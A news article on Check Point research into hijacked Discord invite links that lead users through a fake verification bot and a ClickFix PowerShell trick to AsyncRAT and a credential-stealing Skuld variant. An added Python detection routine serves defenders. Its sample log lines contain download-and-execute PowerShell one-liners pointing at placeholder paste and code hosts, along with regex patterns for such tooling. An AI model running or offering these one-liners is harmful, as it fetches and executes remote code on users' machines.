- Cybercriminals recycle expired invite links to launch silent, devastating multi-stage malware attacks
- A fake Discord bot tricks users into running PowerShell commands disguised as a CAPTCHA fix
- Old community invite links now lead to malware servers that steal your data and digital assets
Cybercriminals are increasingly exploiting a little-known flaw in Discord's invitation system to target unsuspecting users, especially gamers, according to new research.
A report by Check Point researchers found that attackers are able to register previously valid invite links as custom vanity URLs.
The tactic involves hijacking expired or deleted Discord invite links that were once legitimate and trusted, and redirecting them to malicious servers hosting multi-stage malware campaigns.
Trusted links turned into dangerous redirects
These hijacked links, often embedded in old forum posts, community pages or social media, silently funnel users to Discord servers operated by threat actors.
Once on these fake servers, users are greeted by what appears to be a standard verification process.
A bot named “Safeguard” prompts visitors to click a “Verify” button, which initiates an OAuth2 flow and redirects them to a phishing site.
The site uses a social engineering technique called “ClickFix”, in which users are tricked into copying and running a PowerShell command under the guise of fixing a broken CAPTCHA.
This action silently kicks off the malware installation chain, with attackers using cloud services such as Pastebin, GitHub and Bitbucket to deliver multi-stage payloads that blend into normal network traffic.
The initial scripts download executables that retrieve further encrypted payloads, including AsyncRAT, a tool that gives attackers remote control of infected systems, and a custom Skuld stealer variant designed to extract credentials and cryptocurrency wallet data.
Gamers have become a primary target, with campaigns even disguising malware as tools such as a Sims 4 DLC unlocker: an archive named Sims4-unlocker.zip has been downloaded more than 350 times, highlighting the scale of the campaign.
Using clever evasion techniques such as delayed execution and command-line arguments, the malware often slips past detection by even the best antivirus software.
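As an added defender-side illustration (not from the Check Point report or this article), the following Python routine scores PowerShell process-creation events for the ClickFix traits described above: a hidden-window one-liner spawned from the desktop shell that pulls a stage from a paste or code-hosting site, evaluates it in memory and delays execution. The log lines, URLs and weights are constructed placeholders.

```python
import re

# Constructed, hypothetical process-creation events: "user|parent process|command line".
# The URLs are placeholders, not indicators taken from the report.
SAMPLE_EVENTS = [
    'alice|explorer.exe|powershell.exe -w hidden -ep bypass -c "Start-Sleep 20; '
    'iex (iwr https://pastebin.example/raw/PLACEHOLDER)"',
    'bob|explorer.exe|powershell.exe -Command Get-ChildItem C:\\Users\\bob\\Documents',
    'carol|explorer.exe|powershell.exe -nop -w hidden -c "iwr '
    'https://raw.githubusercontent.example/PLACEHOLDER/stage1.ps1 | iex"',
    'dave|code.exe|powershell.exe -File build.ps1',
]

# Weighted indicators (weight, regex). Weights are an assumption for illustration.
INDICATORS = {
    "hidden_window":      (1, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    "policy_bypass":      (1, re.compile(r"-e(?:xecutionpolicy)?p?\s+bypass", re.I)),
    "remote_download":    (2, re.compile(r"\b(?:iwr|invoke-webrequest|curl|wget|downloadstring|downloadfile)\b", re.I)),
    "paste_or_code_host": (2, re.compile(r"pastebin|githubusercontent|github\.com|bitbucket", re.I)),
    "inline_eval":        (2, re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    "delayed_execution":  (1, re.compile(r"start-sleep|\bsleep\s+\d+", re.I)),
}
THRESHOLD = 5  # assumed alert threshold


def score_command(parent, cmdline):
    """Return (score, matched indicator names) for one PowerShell command line."""
    hits = [name for name, (_, rx) in INDICATORS.items() if rx.search(cmdline)]
    score = sum(INDICATORS[name][0] for name in hits)
    # A download-and-evaluate one-liner whose parent is the desktop shell (i.e. pasted
    # into the Run dialog) is the ClickFix pattern; an interactive command with no
    # other hit is ordinary admin activity and gets no bonus.
    if parent.lower() == "explorer.exe" and "remote_download" in hits:
        hits.append("launched_from_shell")
        score += 1
    return score, hits


def triage(events):
    """Parse 'user|parent|cmdline' events and return the users whose score meets THRESHOLD."""
    flagged = []
    for line in events:
        user, parent, cmdline = line.split("|", 2)
        score, hits = score_command(parent, cmdline)
        if score >= THRESHOLD:
            flagged.append({"user": user, "score": score, "hits": hits})
    return flagged
```

Feeding real Sysmon Event ID 1 or EDR process-creation records into `triage` in place of the constructed list surfaces the pasted one-liner at the moment it runs, before the later payload stages have a chance to blend into normal traffic.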
The threat extends beyond typical malware infections. The Skuld stealer used in these attacks can extract seed phrases and passwords from cryptocurrency wallets, effectively granting full control over victims' digital assets.
Given the focus on cryptocurrency theft and credential harvesting, individuals should strengthen their defenses with robust identity theft protection services.
These tools can monitor for unauthorized use of personal information, alert users to breaches and help recover compromised digital identities.
While some may assume that endpoint protection tools would shield them from these tactics, the attack's multi-layered structure often slips under the radar.
To stay safe, users should be wary of links, especially those embedded in old content, and avoid running unexpected scripts or suspicious verification steps.